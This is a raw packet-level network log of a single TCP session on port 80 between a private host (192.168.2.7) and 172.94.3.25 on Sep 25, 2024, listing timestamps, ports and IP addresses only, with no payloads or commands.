Sep 25, 2024 18:33:55.875435114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.875449896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.875452995 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.875467062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.875478029 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.875483990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.875525951 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.029911995 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035144091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035212994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035248041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035284996 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035290956 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035320044 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035356045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035367012 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035401106 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035444021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035475969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035509109 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035541058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035552979 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035573959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035583019 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035607100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035640001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035681963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035685062 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035784006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035821915 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035830975 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035856009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035862923 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035890102 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035922050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035933971 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.035955906 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.035994053 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.036003113 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.036027908 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.036062002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.036092997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.036104918 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.036125898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.036153078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.036158085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.036200047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.036250114 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038212061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038249969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038268089 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038285971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038337946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038356066 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038371086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038407087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038440943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038454056 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038486958 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038501978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038556099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038604021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038640976 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038672924 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038696051 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038714886 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038724899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038758039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038794994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038814068 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038830042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038841963 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038861990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038894892 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038904905 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038928032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038959980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.038969994 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.038997889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039030075 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039062023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039091110 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039096117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039099932 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039130926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039167881 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039172888 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039201975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039237976 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039243937 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039271116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039303064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039336920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039347887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039372921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039417982 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039438009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039474010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039479971 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039506912 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039539099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039545059 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039572001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039603949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039614916 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039638042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039674044 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039705992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039722919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039752960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039762974 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039786100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039822102 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039829969 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039856911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039889097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039899111 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.039923906 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039956093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039989948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.039999962 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.040025949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.040059090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.040083885 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.040091038 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.040102959 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.040174007 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.040210962 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.040218115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.040247917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.040287018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044145107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044179916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044320107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044357061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044369936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044413090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044461966 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044471025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044497013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044501066 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044528008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044567108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044573069 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044600964 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044646025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044651985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044687986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044723034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044766903 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044773102 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044806957 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044841051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044848919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044882059 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044888973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044922113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044955015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.044960976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.044986010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045017958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045028925 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045051098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045082092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045114994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045125008 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045152903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045186996 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045197010 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045227051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045228004 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045258045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045290947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045300961 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045326948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045368910 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045376062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045409918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045444965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045481920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045492887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045515060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045547009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045556068 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045579910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045589924 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045613050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045644999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045656919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045677900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045710087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045718908 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045743942 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045775890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045808077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045820951 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045844078 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045845032 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045876980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045909882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045919895 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.045948029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045979977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.045986891 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046014071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046051979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046084881 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046097994 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046118975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046127081 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046152115 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046185017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046195030 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046221018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046262980 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046278954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046312094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046344995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046381950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046387911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046418905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046449900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046461105 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046483040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046492100 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046514988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046547890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046559095 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046581030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046612978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046622992 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046646118 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046679020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046710968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046722889 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046745062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046777010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046785116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046811104 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046819925 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046844006 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046875954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046888113 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046909094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046941042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.046952009 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.046974897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047007084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047044039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047049999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047075987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047111988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047116995 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047144890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047153950 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047178030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047215939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047225952 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047269106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047302008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047312975 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047334909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047372103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047411919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047437906 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047470093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047501087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047537088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047540903 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047568083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047600985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047632933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047645092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047667027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047674894 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047699928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047733068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047743082 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047770977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047804117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047815084 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047841072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047877073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047878981 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047909975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047943115 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.047949076 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.047975063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048012972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048019886 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048046112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048079014 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048114061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048121929 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048147917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048180103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048192978 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048213005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048218966 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048244953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048276901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048284054 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048310041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048342943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048352003 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048374891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048412085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048444033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048456907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048476934 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048508883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048522949 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048542023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048563004 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048573971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048605919 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048618078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048641920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048675060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048685074 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048707008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048739910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048772097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048780918 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.048805952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.048851967 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.579227924 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.579276085 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.584476948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:56.589344025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.589386940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.589401960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:56.589440107 CEST	49699	80	192.168.2.7	172.94.3.25
